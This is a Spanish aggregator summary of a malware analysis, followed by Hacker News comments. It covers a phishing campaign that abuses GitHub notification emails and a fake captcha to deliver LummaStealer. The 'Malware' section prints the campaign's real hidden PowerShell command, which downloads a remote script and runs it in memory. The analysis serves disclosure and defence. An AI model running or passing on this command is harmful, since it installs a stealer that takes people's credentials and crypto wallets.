Caso de distribución de malware aprovechando correos de notificación de GitHub

 (ianspence.com)
1 puntos por GN⁺ 2024-09-20 | 1 comentarios | Compartir por WhatsApp
  • Como desarrollador de código abierto, es común recibir correos de GitHub con frecuencia
  • La mayoría de los correos son notificaciones sobre interacciones de usuarios en GitHub
  • Sin embargo, algunos correos se hacen pasar por avisos de seguridad de GitHub para inducir la descarga de malware

Método del ataque

  1. El atacante usa una cuenta temporal de GitHub para crear un issue en un repositorio público
  2. El atacante elimina rápidamente el issue
  3. El propietario del repositorio recibe un correo de notificación
  4. Hace clic en el enlace del correo
  5. Sigue las instrucciones e infecta su sistema con malware

Análisis del mensaje de correo

  • La mayor parte del contenido del correo puede ser controlada por el atacante
  • El correo no indica que se creó un issue nuevo
  • El atacante suplanta al "Github Security Team"
  • Como el correo sí fue enviado desde GitHub, pasa las verificaciones anti-phishing

Qué podría mejorar GitHub

  • El correo podría ofrecer más contexto para reducir la efectividad del ataque
  • Se debe limitar el contenido controlable por atacantes y dar mayor claridad sobre el remitente

Sitio web

  • Al seguir el enlace del correo, se llega a una página de captcha
  • La página de captcha induce al usuario a escribir un comando en el cuadro Ejecutar de Windows

Malware

  • El sitio copia el siguiente comando al portapapeles: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • Este comando inicia un proceso de PowerShell y descarga y ejecuta un script

Etapas del malware

  1. Se descarga y ejecuta un script mediante el comando de PowerShell
  2. El script descarga y ejecuta un ejecutable malicioso
  3. El ejecutable tiene firma digital, pero no es válida
  4. Windows no muestra advertencias sobre firmas no válidas

Debilidad de Windows

  • No se establece la marca "Mark of the Web" (MOTW), que identifica archivos descargados de internet
  • La clase System.Net.WebClient de .NET Framework no establece la marca MOTW
  • Si la marca MOTW no está presente, Windows no advierte sobre firmas no válidas

Análisis del malware

  • El malware se carga y ejecuta en memoria
  • Se trata de LummaStealer, un malware que roba billeteras de criptomonedas, credenciales guardadas y más

Conclusión

  • Un caso de ataque que explota debilidades en los correos de notificación de GitHub
  • El análisis se realizó usando diversas herramientas

Resumen de GN⁺

  • Este artículo trata un caso de ataque de malware que explotó correos de notificación de GitHub
  • El malware se distribuyó aprovechando debilidades en el sistema de correo de GitHub
  • También se explotaron debilidades en la marca "Mark of the Web" de Windows y en la validación de firmas digitales
  • Se utilizó el malware llamado LummaStealer
  • Estas debilidades fueron reportadas a GitHub y Microsoft
  • Como otro proyecto con funcionalidad similar, se recomienda el material de análisis de Cyfirma

Lecturas relacionadas

1 comentarios

 
GN⁺ 2024-09-20
Opiniones en Hacker News

  • Recientemente recibí un correo muy convincente de PayPal

    • Alguien usó la función de citas para poner como nombre de la empresa: "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • El correo realmente venía de PayPal.com, y no entiendo cómo no controlan este tipo de nombres de usuario
    • Lo reporté, pero todavía no he recibido respuesta
    • El correo estaba formateado para parecer un correo real de PayPal, así que creo que mucha gente caerá

  • Me pregunto si la gente realmente cae en este tipo de estafas

    • Supongamos que sabes que el correo vino de github
    • Primera alerta: el correo enlaza a una variante del dominio real
    • Segunda alerta: el captcha te pide escribir un comando de shell

  • Parece que los desarrolladores junior podrían caer en este tipo de estafas

    • "Oh, resolver un captcha ejecutando código, ¡qué interesante!"

  • Una página web no debería poder llenar el portapapeles con copiar/pegar con solo un clic

    • No deberías hacer clic en enlaces de correos ni confiar en el contenido del correo
    • El problema es que Windows todavía permite privilegios de root con una sola línea de comando de PowerShell

  • Github debería impedir que servicios automatizados pongan enlaces en issues sin verificar adónde llevan

    • Github debería controlar mejor lo que envía por correo

  • Me pregunto si github-scanner.com sigue siendo una parte maliciosa

    • Cloudflare aloja el DNS y no hay forma de reportar este problema

  • El atacante borró el issue rápidamente

    • Solo los administradores pueden borrar un issue
    • Así que quedó un rastro del issue en el repositorio

  • Buen artículo, me dio una vibra parecida al blog de Julia Evans

  • Es triste que incluso en 2024 todavía haya personas que caen en los engaños más simples

  • Recibí una notificación como esta esta mañana y la ignoré

    • La notificación era sobre un repositorio específico

  • Vale la pena leerlo, muestra lo que estaban intentando hacer

    • El enlace por sí solo ya puede parecer sospechoso, pero es interesante ver a alguien investigarlo a fondo

  • Recibí un correo de notificación de GitHub parecido

    • Decía que se había encontrado una vulnerabilidad en el repositorio, pero no hice clic
    • No hice clic porque soy un programador perezoso